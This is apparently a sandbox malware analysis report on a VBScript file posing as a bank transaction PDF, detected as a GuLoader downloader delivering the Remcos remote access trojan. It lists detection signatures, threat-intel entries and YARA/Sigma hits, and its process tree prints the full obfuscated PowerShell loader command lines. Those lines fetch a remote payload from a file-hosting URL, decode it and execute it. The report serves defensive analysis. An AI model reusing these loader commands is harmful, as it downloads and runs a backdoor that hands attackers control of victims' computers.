Edit tour

Windows Analysis Report
pko_trans_details_20240909_105339#U00b7pdf.vbs

Overview

General Information

Sample name:	pko_trans_details_20240909_105339#U00b7pdf.vbs renamed because original name is a hash value
Original sample name:	pko_trans_details_20240909_105339pdf.vbs
Analysis ID:	1507755
MD5:	f47be72a96dd07190c9636231654dfe5
SHA1:	b0f23fa8a4669111d04e442e81888330f76b5689
SHA256:	8317fc4b7eb8d40478a79de9fc539469ab5b2904822894ac6eee27f7cf9e6ce9
Tags:	vbs
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Obfuscated command line found

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5660 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 5504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5416 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 3452 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 7192 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 7396 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 7624 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

rundll32.exe (PID: 7688 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.1633262835.0000000009630000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000C.00000002.1634165473.000000000C6E5000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
Process Memory Space: powershell.exe PID: 5504	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 5504	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xe69b7:$b2: ::FromBase64String( 0x22753a:$b2: ::FromBase64String( 0x22757a:$b2: ::FromBase64String( 0x2275bb:$b2: ::FromBase64String( 0x2275fd:$b2: ::FromBase64String( 0x227640:$b2: ::FromBase64String( 0x227684:$b2: ::FromBase64String( 0x2276c9:$b2: ::FromBase64String( 0x22770f:$b2: ::FromBase64String( 0x227756:$b2: ::FromBase64String( 0x22779e:$b2: ::FromBase64String( 0x2277e7:$b2: ::FromBase64String( 0x227831:$b2: ::FromBase64String( 0x22787c:$b2: ::FromBase64String( 0x2278c8:$b2: ::FromBase64String( 0x227915:$b2: ::FromBase64String( 0xb3e9:$s1: -join 0x184be:$s1: -join 0x1b890:$s1: -join 0x1bf42:$s1: -join 0x1da33:$s1: -join
Process Memory Space: powershell.exe PID: 3452	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3452	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3680b7:$b2: ::FromBase64String( 0x148bd5:$s1: -join 0x149573:$s1: -join 0x15bf7b:$s1: -join 0x169050:$s1: -join 0x16c422:$s1: -join 0x16cad4:$s1: -join 0x16e5c5:$s1: -join 0x1707cb:$s1: -join 0x170ff2:$s1: -join 0x171862:$s1: -join 0x171f9d:$s1: -join 0x171fcf:$s1: -join 0x172017:$s1: -join 0x172036:$s1: -join 0x172886:$s1: -join 0x172a02:$s1: -join 0x172a7a:$s1: -join 0x172b0d:$s1: -join 0x172d73:$s1: -join 0x174f09:$s1: -join
Process Memory Space: wab.exe PID: 7396	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 5 entries

Other

Source	Rule	Description	Author	Strings
amsi64_5504.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_3452.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xe629:$b2: ::FromBase64String( 0xd69c:$s1: -join 0x6e48:$s4: += 0x6f0a:$s4: += 0xb131:$s4: += 0xd24e:$s4: += 0xd538:$s4: += 0xd67e:$s4: += 0x16b3a:$s4: += 0x16bba:$s4: += 0x16c80:$s4: += 0x16d00:$s4: += 0x16ed6:$s4: += 0x16f5a:$s4: += 0xdec9:$e4: Get-WmiObject 0xe0b8:$e4: Get-Process 0xe110:$e4: Start-Process 0x177c1:$e4: Get-Process

Sigma Signatures

System Summary

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

